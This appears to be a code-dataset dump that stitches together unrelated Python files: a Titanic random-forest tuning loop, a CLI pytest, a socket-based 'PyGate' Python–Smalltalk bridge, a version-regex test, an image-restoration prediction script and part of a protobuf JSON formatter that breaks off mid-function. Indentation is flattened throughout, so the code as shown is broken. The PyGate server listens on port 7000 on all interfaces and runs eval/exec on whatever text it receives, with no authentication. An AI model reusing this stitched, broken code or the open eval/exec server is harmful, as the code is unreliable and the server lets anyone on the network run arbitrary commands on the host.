test_data["SP"] = test_data["SibSp"]+test_data["Parch"]
print('Defining predictors...')
predictors = ["Pclass", "Sex", "Age", "PSA", "Fare", "Embarked", "SP"]
print('Finding best n_estimators for RandomForestClassifier...')
max_score = 0
best_n = 0
for n in range(1,300):
rfc_scr = 0.
rfc = RandomForestClassifier(n_estimators=n)
for train, test in KFold(len(train_data), n_folds=10, shuffle=True):
rfc.fit(train_data[predictors].T[train].T, train_data["Survived"].T[train].T)
rfc_scr += rfc.score(train_data[predictors].T[test].T, train_data["Survived"].T[test].T)/10
if rfc_scr > max_score:
max_score = rfc_scr
best_n = n
print(best_n, max_score)
print('Finding best max_depth for RandomForestClassifier...')
max_score = 0
best_m = 0
for m in range(1,100):
rfc_scr = 0.
rfc = RandomForestClassifier(max_depth=m)
for train, test in KFold(len(train_data), n_folds=10, shuffle=True):
rfc.fit(train_data[predictors].T[train].T, train_data["Survived"].T[train].T)
rfc_scr += rfc.score(train_data[predictors].T[test].T, train_data["Survived"].T[test].T)/10
if rfc_scr > max_score:
max_score = rfc_scr
best_m = m
print(best_m, max_score)
print('Applying method...')
rfc = RandomForestClassifier(n_estimators=best_n, max_depth=best_m)
print('Creating submission...')
create_submission(rfc, train_data, test_data, predictors, "rfcsurvivors.csv")
print('Submitted.') | 40.012346 | 99 | 0.688985 |
ace744d6cf7a1d8f8c0efb75f037da86f941c3ba | 410 | py | Python | bac/scripts/evaluate_test.py | kaschbacher/bac | 858ebe1bcd61dd6a73431bb651d1b3efa447a8c6 | [
"RSA-MD"
] | 1 | 2021-02-14T04:11:58.000Z | 2021-02-14T04:11:58.000Z | bac/scripts/evaluate_test.py | kaschbacher/bac | 858ebe1bcd61dd6a73431bb651d1b3efa447a8c6 | [
"RSA-MD"
] | 1 | 2021-07-12T10:37:55.000Z | 2021-07-12T10:37:55.000Z | bac/scripts/evaluate_test.py | kaschbacher/bac | 858ebe1bcd61dd6a73431bb651d1b3efa447a8c6 | [
"RSA-MD"
] | null | null | null | import os
import pytest
from click.testing import CliRunner
from bac.scripts.evaluate import main
@pytest.mark.parametrize("config_file", [("configs/config.yml")])
def test_evaluate(config_file):
runner = CliRunner()
os.environ["MLFLOW_TRACKING_URI"] = "./experiments"
os.environ["MLFLOW_ARTIFACT_LOCATION"] = ""
result = runner.invoke(main, [config_file])
assert result.exit_code == 0
| 25.625 | 65 | 0.731707 |
ace7451415920be5fd1eb8b49593ad505c037bcf | 3,617 | py | Python | py/gate.py | shingarov/PyGate | bac253d88fb905f79d23723e742e1c54820a3ab5 | [
"MIT"
] | null | null | null | py/gate.py | shingarov/PyGate | bac253d88fb905f79d23723e742e1c54820a3ab5 | [
"MIT"
] | null | null | null | py/gate.py | shingarov/PyGate | bac253d88fb905f79d23723e742e1c54820a3ab5 | [
"MIT"
] | null | null | null | """Python Gate server.
"""
import z3
import pdb, traceback
import inspect, sys, json, random
import socket, socketserver
#import angr, archinfo
#from claripy import *
#from pyvex.const import *
#from pyvex.expr import *
#from pyvex.stmt import *
#from pyvex import *
e = {}
class SmalltalkCallbackReturn(Exception):
def __init__(self, returnValue):
self.returnValue = returnValue
class PythonGate(socketserver.StreamRequestHandler):
def read_one(self):
requestline = self.rfile.readline().decode()
sys.stdout.write("> %s" % requestline)
return requestline
def write_one(self, answer):
ans = answer + '\r\n'
self.wfile.write(ans.encode())
sys.stdout.write("< %s" % ans)
self.wfile.flush()
def handle_one_packet(self):
requestline = self.read_one()
answer = self.getAnswer(requestline)
self.write_one(answer)
def handle(self):
self.incomingJsonVarName = None
while True:
self.handle_one_packet()
def getAnswer(self, request):
if self.incomingJsonVarName:
e[self.incomingJsonVarName.rstrip()] = self.deser(request)
self.incomingJsonVarName = None
return '+'
if not request:
return ''
if request[0]=='.':
return self.doExec(request[1:])
elif request[0]==':':
self.incomingJsonVarName = request[1:]
return ':'
elif request[0]=='^':
raise SmalltalkCallbackReturn(self.deser(request[1:]))
else:
return self.doEval(request);
def doEval(self, request):
result = eval(request)
try:
return 'J' + json.dumps(result)
except TypeError:
return '+' + self.getNonJSON(result)
def doExec(self, value):
try:
exec(value)
return '+'
except:
return '-' + traceback.format_exc()
def getNonJSON(self, value):
if inspect.isclass(value):
return 'type:' + value.__name__
return value.__class__.__name__ + ':' + value.__str__()
def deser(self, serializedString):
if serializedString[0]=='!':
return SmalltalkObject(self, serializedString[1:])
return json.loads(serializedString)
class SmalltalkRMIActivation:
def __init__(self, gate, ident, selector, args, kwargs):
self.gate = gate
self.ident = ident
self.selector = selector
self.args = args
self.kwargs = kwargs
def perform(self):
k = 'rmiAct' + str(random.randint(0,9999999))
e[k] = self
self.gate.write_one('!'+k)
try:
self.gate.handle()
except SmalltalkCallbackReturn as ex:
return ex.returnValue
class SmalltalkRMI:
def __init__(self, gate, ident, selector):
self.gate = gate
self.ident = ident
self.selector = selector
def __call__(self, *args, **kwargs):
return SmalltalkRMIActivation(self.gate, self.ident, self.selector, args, kwargs).perform()
class SmalltalkObject:
def __init__(self, gate, ident):
self.gate = gate
self.ident = ident
def __getattribute__(self, name):
if name=='__class__':
return SmalltalkObject
if name=='__str__':
return object.__getattribute__(self, '__str__')
return SmalltalkRMI(object.__getattribute__(self, 'gate'), object.__getattribute__(self, 'ident'), name)
socketserver.TCPServer(('',7000), PythonGate).serve_forever()
| 26.595588 | 112 | 0.603262 |
ace7453f56989ab64be547032360b81566d7fdcc | 751 | py | Python | rv/tests/test_rv.py | weaverba137/rv | 3c7b467c4964bd3ccaa949ab17c7df4c4ba2ac2a | [
"BSD-3-Clause"
] | 1 | 2016-02-09T16:02:26.000Z | 2016-02-09T16:02:26.000Z | rv/tests/test_rv.py | weaverba137/rv | 3c7b467c4964bd3ccaa949ab17c7df4c4ba2ac2a | [
"BSD-3-Clause"
] | null | null | null | rv/tests/test_rv.py | weaverba137/rv | 3c7b467c4964bd3ccaa949ab17c7df4c4ba2ac2a | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import re
from .. import __version__ as rv_version
class TestRV(object):
"""Test the top-level rv functions.
"""
def setup(self):
self.versionre = re.compile(r'''
([0-9]+!)? # epoch
([0-9]+) # major
(\.[0-9]+)* # minor
((a|b|rc|\.post|\.dev)[0-9]+)?''',
re.X)
def teardown(self):
pass
def test_version(self):
"""Ensure the version conforms to PEP386/PEP440.
"""
assert self.versionre.match(rv_version) is not None
| 28.884615 | 70 | 0.44474 |
ace74576bdd6d620169a5a56fe29a92a6d98fa54 | 5,689 | py | Python | predict.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | 2 | 2022-03-29T14:03:16.000Z | 2022-03-29T14:03:54.000Z | predict.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | null | null | null | predict.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | 1 | 2022-03-29T14:05:16.000Z | 2022-03-29T14:05:16.000Z | import torch
import time
import argparse
from torch.autograd import Variable
from torchvision.utils import make_grid
from models.model_RCRN import GeneratorUNet, Discriminator, weights_init_normal
from datasets import *
from util.TestMetrics import get_PSNR, get_SSIM
# from datasets import skeletonPrepare
########################################
##### Tools Definitions #####
########################################
##### Load weights of the model #####
def loadModel(model):
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
state_dict = torch.load(opt.model_path, map_location=device)
model.load_state_dict(state_dict)
model = model.to(device)
return model
##### Concat input and target pics for visual comparison #####
def concat(imgA, imgB):
size1, size2 = imgA.size, imgB.size
joint = Image.new(opt.color_set, (size1[0] + size2[0], size1[1]))
loc1, loc2 = (0, 0), (size1[0], 0)
joint.paste(imgA, loc1)
joint.paste(imgB, loc2)
# joint.show()
return joint
##### Image pre-processing #####
def AdditionalProcess(pic):
# If input pic is the combination of input and target pics
if opt.IsPre == True:
width, height = pic.size
pic = pic.crop((width / 2, 0, width, height))
Ori_width, Ori_height = pic.size
# If there is additional processing on input pics
# pic = skeletonPrepare(pic)
return pic, Ori_width, Ori_height
##### Save a given Tensor into an image file #####
def Get_tensor(tensor, nrow=8, padding=2,
normalize=False, irange=None, scale_each=False, pad_value=0):
grid = make_grid(tensor, nrow=nrow, padding=padding, pad_value=pad_value,
normalize=normalize, irange=irange, scale_each=scale_each)
# Add 0.5 after unnormalizing to [0, 255] to round to nearest integer
ndarr = grid.mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
im = Image.fromarray(ndarr)
return im
########################################
##### Image Processing #####
########################################
if __name__ == '__main__':
##### arguments settings #####
parser = argparse.ArgumentParser()
parser.add_argument("--input_path", type=str, default="data/Dataset1/test", help="path of input pics")
parser.add_argument("--store_path", type=str, default="data/Dataset1/predict-results/",
help="path for stroing the output pics")
parser.add_argument("--model_path", type=str, default="saved_models/Dataset1/model_RCRN_generator_50.pth",
help="path for loading the trained models")
parser.add_argument("--img_height", type=int, default=256, help="size of image height")
parser.add_argument("--img_width", type=int, default=256, help="size of image width")
parser.add_argument("--channels", type=int, default=3, help="number of image channels")
parser.add_argument("--color_set", type=str, default="RGB", help="number of image color set, RGB or L ")
parser.add_argument("--IsPre", type=bool, default=True, help="If need to make pre-processing on input pics")
parser.add_argument("--OutputComparisons", type=bool, default=True,
help="If need to make pre-processing on input pics")
parser.add_argument("--dataset_name", type=str, default="Oracles2", help="name of the dataset")
opt = parser.parse_args()
##### Create store_path #####
os.makedirs(opt.store_path, exist_ok=True)
##### Initialize CUDA and Tensor #####
cuda = True if torch.cuda.is_available() else False
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
##### data transformations #####
transforms_ = [
transforms.Resize((opt.img_height, opt.img_width)),
transforms.ToTensor(),
transforms.Normalize([0.5], [0.5])]
transform = transforms.Compose(transforms_)
##### Process input pics #####
pics = os.listdir(opt.input_path)
for pic in pics:
# Get pic name and set names of output files
name = pic.split(".")[0]
output_path = os.path.join(opt.store_path, name) + ".png"
output_path_compare = os.path.join(opt.store_path, name) + "_compare.jpeg"
# Read pic by PIL and make Pre-preocessing before feeding the input pic
image = Image.open(os.path.join(opt.input_path, pic)).convert(opt.color_set)
Ori_image, Ori_width, Ori_height = AdditionalProcess(image)
image = transform(Ori_image)
# Resize the pic in to (batch, channel, width, height)
image = image.resize(1, opt.channels, opt.img_width, opt.img_height)
image = Variable(image.type(Tensor))
# Load the weights of model
generator = loadModel(GeneratorUNet())
# Calculate inference period of the model for single image, and get the output image
start = time.time()
output = generator(image)
end = time.time()
print("processing time: ", (end - start) * 1000, "ms")
# Obtain output image and convert to PIL format, then resize the image into the original size
Output_img = Get_tensor(output.data, normalize=True)
Output_img = Output_img.resize((Ori_width, Ori_height))
Output_img.save(output_path)
# Save the combination of input and target pics for visual comparison
if opt.OutputComparisons == True:
Comparison_img = concat(Output_img, Ori_image)
Comparison_img.save(output_path_compare)
| 41.830882 | 113 | 0.630867 |
ace74590a36527f725be7de871e38cc7bd01d473 | 36,865 | py | Python | dingus/codec/json_format.py | ricott1/dingus | ef0edd9fff164f54171b354714e600f410a3bbe9 | [
"MIT"
] | null | null | null | dingus/codec/json_format.py | ricott1/dingus | ef0edd9fff164f54171b354714e600f410a3bbe9 | [
"MIT"
] | null | null | null | dingus/codec/json_format.py | ricott1/dingus | ef0edd9fff164f54171b354714e600f410a3bbe9 | [
"MIT"
] | null | null | null | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in JSON format.
Only modification is returning hex encoding of bytes type,
rather than base 64.
Simple usage example:
# Create a proto object and serialize it to a json format string.
message = my_proto_pb2.MyMessage(foo='bar')
json_string = json_format.MessageToJson(message)
# Parse a json format string to proto object.
message = json_format.Parse(json_string, my_proto_pb2.MyMessage())
"""
__author__ = "jieluo@google.com (Jie Luo)"
from collections import OrderedDict
import json
import math
from operator import methodcaller
import re
import sys
from google.protobuf.internal import type_checkers
from google.protobuf import descriptor
from google.protobuf import symbol_database
_TIMESTAMPFOMAT = "%Y-%m-%dT%H:%M:%S"
_INT_TYPES = frozenset(
[
descriptor.FieldDescriptor.CPPTYPE_INT32,
descriptor.FieldDescriptor.CPPTYPE_UINT32,
descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64,
]
)
_INT64_TYPES = frozenset(
[
descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64,
]
)
_FLOAT_TYPES = frozenset(
[
descriptor.FieldDescriptor.CPPTYPE_FLOAT,
descriptor.FieldDescriptor.CPPTYPE_DOUBLE,
]
)
_INFINITY = "Infinity"
_NEG_INFINITY = "-Infinity"
_NAN = "NaN"
_UNPAIRED_SURROGATE_PATTERN = re.compile(
"[\ud800-\udbff](?![\udc00-\udfff])|(?<![\ud800-\udbff])[\udc00-\udfff]"
)
_VALID_EXTENSION_NAME = re.compile(r"\[[a-zA-Z0-9\._]*\]$")
class Error(Exception):
"""Top-level module error for json_format."""
class SerializeToJsonError(Error):
"""Thrown if serialization to JSON fails."""
class ParseError(Error):
"""Thrown in case of parsing error."""
def MessageToJson(
message,
including_default_value_fields=False,
preserving_proto_field_name=False,
indent=2,
sort_keys=False,
use_integers_for_enums=False,
descriptor_pool=None,
float_precision=None,
):
"""Converts protobuf message to JSON format.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
preserving_proto_field_name: If True, use the original proto field
names as defined in the .proto file. If False, convert the field
names to lowerCamelCase.
indent: The JSON object will be pretty-printed with this indent level.
An indent level of 0 or negative will only insert newlines.
sort_keys: If True, then the output will be sorted by field names.
use_integers_for_enums: If true, print integers instead of enum names.
descriptor_pool: A Descriptor Pool for resolving types. If None use the
default.
float_precision: If set, use this to specify float field valid digits.
Returns:
A string containing the JSON formatted protocol buffer message.
"""
printer = _Printer(
including_default_value_fields,
preserving_proto_field_name,
use_integers_for_enums,
descriptor_pool,
float_precision=float_precision,
)
return printer.ToJsonString(message, indent, sort_keys)
def MessageToDict(
message,
including_default_value_fields=False,
preserving_proto_field_name=False,
use_integers_for_enums=False,
descriptor_pool=None,
float_precision=None,
):
"""Converts protobuf message to a dictionary.
When the dictionary is encoded to JSON, it conforms to proto3 JSON spec.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
preserving_proto_field_name: If True, use the original proto field
names as defined in the .proto file. If False, convert the field
names to lowerCamelCase.
use_integers_for_enums: If true, print integers instead of enum names.
descriptor_pool: A Descriptor Pool for resolving types. If None use the
default.
float_precision: If set, use this to specify float field valid digits.
Returns:
A dict representation of the protocol buffer message.
"""
printer = _Printer(
including_default_value_fields,
preserving_proto_field_name,
use_integers_for_enums,
descriptor_pool,
float_precision=float_precision,
)
# pylint: disable=protected-access
return printer._MessageToJsonObject(message)
def _IsMapEntry(field):
return (
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE
and field.message_type.has_options
and field.message_type.GetOptions().map_entry
)
class _Printer(object):
"""JSON format printer for protocol message."""
def __init__(
self,
including_default_value_fields=False,
preserving_proto_field_name=False,
use_integers_for_enums=False,
descriptor_pool=None,
float_precision=None,
):
self.including_default_value_fields = including_default_value_fields
self.preserving_proto_field_name = preserving_proto_field_name
self.use_integers_for_enums = use_integers_for_enums
self.descriptor_pool = descriptor_pool
if float_precision:
self.float_format = ".{}g".format(float_precision)
else:
self.float_format = None
def ToJsonString(self, message, indent, sort_keys):
js = self._MessageToJsonObject(message)
return json.dumps(js, indent=indent, sort_keys=sort_keys)
def _MessageToJsonObject(self, message):
"""Converts message to an object according to Proto3 JSON Specification."""
message_descriptor = message.DESCRIPTOR
full_name = message_descriptor.full_name
if _IsWrapperMessage(message_descriptor):
return self._WrapperMessageToJsonObject(message)
if full_name in _WKTJSONMETHODS:
return methodcaller(_WKTJSONMETHODS[full_name][0], message)(self)
js = {}
return self._RegularMessageToJsonObject(message, js)
def _RegularMessageToJsonObject(self, message, js):
"""Converts normal message according to Proto3 JSON Specification."""
fields = message.ListFields()
try:
for field, value in fields:
if self.preserving_proto_field_name:
name = field.name
else:
name = field.json_name
if _IsMapEntry(field):
# Convert a map field.
v_field = field.message_type.fields_by_name["value"]
js_map = {}
for key in value:
if isinstance(key, bool):
if key:
recorded_key = "true"
else:
recorded_key = "false"
else:
recorded_key = str(key)
js_map[recorded_key] = self._FieldToJsonObject(
v_field, value[key]
)
js[name] = js_map
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
# Convert a repeated field.
js[name] = [self._FieldToJsonObject(field, k) for k in value]
elif field.is_extension:
name = "[%s]" % field.full_name
js[name] = self._FieldToJsonObject(field, value)
else:
js[name] = self._FieldToJsonObject(field, value)
# Serialize default value if including_default_value_fields is True.
if self.including_default_value_fields:
message_descriptor = message.DESCRIPTOR
for field in message_descriptor.fields:
# Singular message fields and oneof fields will not be affected.
if (
field.label != descriptor.FieldDescriptor.LABEL_REPEATED
and field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE
) or field.containing_oneof:
continue
if self.preserving_proto_field_name:
name = field.name
else:
name = field.json_name
if name in js:
# Skip the field which has been serialized already.
continue
if _IsMapEntry(field):
js[name] = {}
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
js[name] = []
else:
js[name] = self._FieldToJsonObject(field, field.default_value)
except ValueError as e:
raise SerializeToJsonError(
"Failed to serialize {0} field: {1}.".format(field.name, e)
)
return js
def _FieldToJsonObject(self, field, value):
"""Converts field value according to Proto3 JSON Specification."""
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
return self._MessageToJsonObject(value)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
if self.use_integers_for_enums:
return value
if field.enum_type.full_name == "google.protobuf.NullValue":
return None
enum_value = field.enum_type.values_by_number.get(value, None)
if enum_value is not None:
return enum_value.name
else:
if field.file.syntax == "proto3":
return value
raise SerializeToJsonError(
"Enum field contains an integer value "
"which can not mapped to an enum value."
)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# Use hex Data encoding for bytes
return value.hex()
else:
return value
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
return bool(value)
elif field.cpp_type in _INT64_TYPES:
return str(value)
elif field.cpp_type in _FLOAT_TYPES:
if math.isinf(value):
if value < 0.0:
return _NEG_INFINITY
else:
return _INFINITY
if math.isnan(value):
return _NAN
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_FLOAT:
if self.float_format:
return float(format(value, self.float_format))
else:
return type_checkers.ToShortestFloat(value)
return value
def _AnyMessageToJsonObject(self, message):
"""Converts Any message according to Proto3 JSON Specification."""
if not message.ListFields():
return {}
# Must print @type first, use OrderedDict instead of {}
js = OrderedDict()
type_url = message.type_url
js["@type"] = type_url
sub_message = _CreateMessageFromTypeUrl(type_url, self.descriptor_pool)
sub_message.ParseFromString(message.value)
message_descriptor = sub_message.DESCRIPTOR
full_name = message_descriptor.full_name
if _IsWrapperMessage(message_descriptor):
js["value"] = self._WrapperMessageToJsonObject(sub_message)
return js
if full_name in _WKTJSONMETHODS:
js["value"] = methodcaller(_WKTJSONMETHODS[full_name][0], sub_message)(self)
return js
return self._RegularMessageToJsonObject(sub_message, js)
def _GenericMessageToJsonObject(self, message):
"""Converts message according to Proto3 JSON Specification."""
# Duration, Timestamp and FieldMask have ToJsonString method to do the
# convert. Users can also call the method directly.
return message.ToJsonString()
def _ValueMessageToJsonObject(self, message):
"""Converts Value message according to Proto3 JSON Specification."""
which = message.WhichOneof("kind")
# If the Value message is not set treat as null_value when serialize
# to JSON. The parse back result will be different from original message.
if which is None or which == "null_value":
return None
if which == "list_value":
return self._ListValueMessageToJsonObject(message.list_value)
if which == "struct_value":
value = message.struct_value
else:
value = getattr(message, which)
oneof_descriptor = message.DESCRIPTOR.fields_by_name[which]
return self._FieldToJsonObject(oneof_descriptor, value)
def _ListValueMessageToJsonObject(self, message):
"""Converts ListValue message according to Proto3 JSON Specification."""
return [self._ValueMessageToJsonObject(value) for value in message.values]
def _StructMessageToJsonObject(self, message):
"""Converts Struct message according to Proto3 JSON Specification."""
fields = message.fields
ret = {}
for key in fields:
ret[key] = self._ValueMessageToJsonObject(fields[key])
return ret
def _WrapperMessageToJsonObject(self, message):
return self._FieldToJsonObject(
message.DESCRIPTOR.fields_by_name["value"], message.value
)
def _IsWrapperMessage(message_descriptor):
return message_descriptor.file.name == "google/protobuf/wrappers.proto"
def _DuplicateChecker(js):
result = {}
for name, value in js:
if name in result:
raise ParseError("Failed to load JSON: duplicate key {0}.".format(name))
result[name] = value
return result
def _CreateMessageFromTypeUrl(type_url, descriptor_pool):
"""Creates a message from a type URL."""
db = symbol_database.Default()
pool = db.pool if descriptor_pool is None else descriptor_pool
type_name = type_url.split("/")[-1]
try:
message_descriptor = pool.FindMessageTypeByName(type_name)
except KeyError:
raise TypeError(
"Can not find message descriptor by type_url: {0}.".format(type_url)
)
message_class = db.GetPrototype(message_descriptor)
return message_class()
def Parse(text, message, ignore_unknown_fields=False, descriptor_pool=None):
"""Parses a JSON representation of a protocol message into a message.
Args:
text: Message JSON representation.
message: A protocol buffer message to merge into.
ignore_unknown_fields: If True, do not raise errors for unknown fields.
descriptor_pool: A Descriptor Pool for resolving types. If None use the
default.
Returns:
The same message passed as argument.
Raises::
ParseError: On JSON parsing problems.
"""
if not isinstance(text, str):
text = text.decode("utf-8")
try:
js = json.loads(text, object_pairs_hook=_DuplicateChecker)
except ValueError as e:
raise ParseError("Failed to load JSON: {0}.".format(str(e)))
return ParseDict(js, message, ignore_unknown_fields, descriptor_pool)
def ParseDict(js_dict, message, ignore_unknown_fields=False, descriptor_pool=None):
"""Parses a JSON dictionary representation into a message.
Args:
js_dict: Dict representation of a JSON message.
message: A protocol buffer message to merge into.
ignore_unknown_fields: If True, do not raise errors for unknown fields.
descriptor_pool: A Descriptor Pool for resolving types. If None use the
default.
Returns:
The same message passed as argument.
"""
parser = _Parser(ignore_unknown_fields, descriptor_pool)
parser.ConvertMessage(js_dict, message)
return message
_INT_OR_FLOAT = (int, float)
class _Parser(object):
"""JSON format parser for protocol message."""
def __init__(self, ignore_unknown_fields, descriptor_pool):
self.ignore_unknown_fields = ignore_unknown_fields
self.descriptor_pool = descriptor_pool
def ConvertMessage(self, value, message):
"""Convert a JSON object into a message.
Args:
value: A JSON object.
message: A WKT or regular protocol message to record the data.
Raises:
ParseError: In case of convert problems.
"""
message_descriptor = message.DESCRIPTOR
full_name = message_descriptor.full_name
if _IsWrapperMessage(message_descriptor):
self._ConvertWrapperMessage(value, message)
elif full_name in _WKTJSONMETHODS:
methodcaller(_WKTJSONMETHODS[full_name][1], value, message)(self)
else:
self._ConvertFieldValuePair(value, message)
def _ConvertFieldValuePair(self, js, message):
"""Convert field value pairs into regular message.
Args:
js: A JSON object to convert the field value pairs.
message: A regular protocol message to record the data.
Raises:
ParseError: In case of problems converting.
"""
names = []
message_descriptor = message.DESCRIPTOR
fields_by_json_name = dict((f.json_name, f) for f in message_descriptor.fields)
for name in js:
try:
field = fields_by_json_name.get(name, None)
if not field:
field = message_descriptor.fields_by_name.get(name, None)
if not field and _VALID_EXTENSION_NAME.match(name):
if not message_descriptor.is_extendable:
raise ParseError(
"Message type {0} does not have extensions".format(
message_descriptor.full_name
)
)
identifier = name[1:-1] # strip [] brackets
# pylint: disable=protected-access
field = message.Extensions._FindExtensionByName(identifier)
# pylint: enable=protected-access
if not field:
# Try looking for extension by the message type name, dropping the
# field name following the final . separator in full_name.
identifier = ".".join(identifier.split(".")[:-1])
# pylint: disable=protected-access
field = message.Extensions._FindExtensionByName(identifier)
# pylint: enable=protected-access
if not field:
if self.ignore_unknown_fields:
continue
raise ParseError(
(
'Message type "{0}" has no field named "{1}".\n'
" Available Fields(except extensions): {2}"
).format(
message_descriptor.full_name,
name,
[f.json_name for f in message_descriptor.fields],
)
)
if name in names:
raise ParseError(
'Message type "{0}" should not have multiple '
'"{1}" fields.'.format(message.DESCRIPTOR.full_name, name)
)
names.append(name)
value = js[name]
# Check no other oneof field is parsed.
if field.containing_oneof is not None and value is not None:
oneof_name = field.containing_oneof.name
if oneof_name in names:
raise ParseError(
'Message type "{0}" should not have multiple '
'"{1}" oneof fields.'.format(
message.DESCRIPTOR.full_name, oneof_name
)
)
names.append(oneof_name)
if value is None:
if (
field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE
and field.message_type.full_name == "google.protobuf.Value"
):
sub_message = getattr(message, field.name)
sub_message.null_value = 0
elif (
field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM
and field.enum_type.full_name == "google.protobuf.NullValue"
):
setattr(message, field.name, 0)
else:
message.ClearField(field.name)
continue
# Parse field value.
if _IsMapEntry(field):
message.ClearField(field.name)
self._ConvertMapFieldValue(value, message, field)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
message.ClearField(field.name)
if not isinstance(value, list):
raise ParseError(
"repeated field {0} must be in [] which is "
"{1}.".format(name, value)
)
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
# Repeated message field.
for item in value:
sub_message = getattr(message, field.name).add()
# None is a null_value in Value.
if (
item is None
and sub_message.DESCRIPTOR.full_name
!= "google.protobuf.Value"
):
raise ParseError(
"null is not allowed to be used as an element"
" in a repeated field."
)
self.ConvertMessage(item, sub_message)
else:
# Repeated scalar field.
for item in value:
if item is None:
raise ParseError(
"null is not allowed to be used as an element"
" in a repeated field."
)
getattr(message, field.name).append(
_ConvertScalarFieldValue(item, field)
)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
if field.is_extension:
sub_message = message.Extensions[field]
else:
sub_message = getattr(message, field.name)
sub_message.SetInParent()
self.ConvertMessage(value, sub_message)
else:
if field.is_extension:
message.Extensions[field] = _ConvertScalarFieldValue(
value, field
)
else:
setattr(
message, field.name, _ConvertScalarFieldValue(value, field)
)
except ParseError as e:
if field and field.containing_oneof is None:
raise ParseError("Failed to parse {0} field: {1}.".format(name, e))
else:
raise ParseError(str(e))
except ValueError as e:
raise ParseError("Failed to parse {0} field: {1}.".format(name, e))
except TypeError as e:
raise ParseError("Failed to parse {0} field: {1}.".format(name, e))
def _ConvertAnyMessage(self, value, message):
"""Convert a JSON representation into Any message."""
if isinstance(value, dict) and not value:
return
try:
type_url = value["@type"]
except KeyError:
raise ParseError("@type is missing when parsing any message.")
sub_message = _CreateMessageFromTypeUrl(type_url, self.descriptor_pool)
message_descriptor = sub_message.DESCRIPTOR
full_name = message_descriptor.full_name
if _IsWrapperMessage(message_descriptor):
self._ConvertWrapperMessage(value["value"], sub_message)
elif full_name in _WKTJSONMETHODS:
methodcaller(_WKTJSONMETHODS[full_name][1], value["value"], sub_message)(
self
)
else:
del value["@type"]
self._ConvertFieldValuePair(value, sub_message)
value["@type"] = type_url
# Sets Any message
message.value = sub_message.SerializeToString()
message.type_url = type_url
def _ConvertGenericMessage(self, value, message):
"""Convert a JSON representation into message with FromJsonString."""
# Duration, Timestamp, FieldMask have a FromJsonString method to do the
# conversion. Users can also call the method directly.
try:
message.FromJsonString(value)
except ValueError as e:
raise ParseError(e)
def _ConvertValueMessage(self, value, message):
"""Convert a JSON representation into Value message."""
if isinstance(value, dict):
self._ConvertStructMessage(value, message.struct_value)
elif isinstance(value, list):
self._ConvertListValueMessage(value, message.list_value)
elif value is None:
message.null_value = 0
elif isinstance(value, bool):
message.bool_value = value
elif isinstance(value, str):
message.string_value = value
elif isinstance(value, _INT_OR_FLOAT):
message.number_value = value
else:
raise ParseError(
"Value {0} has unexpected type {1}.".format(value, type(value))
)
def _ConvertListValueMessage(self, value, message):
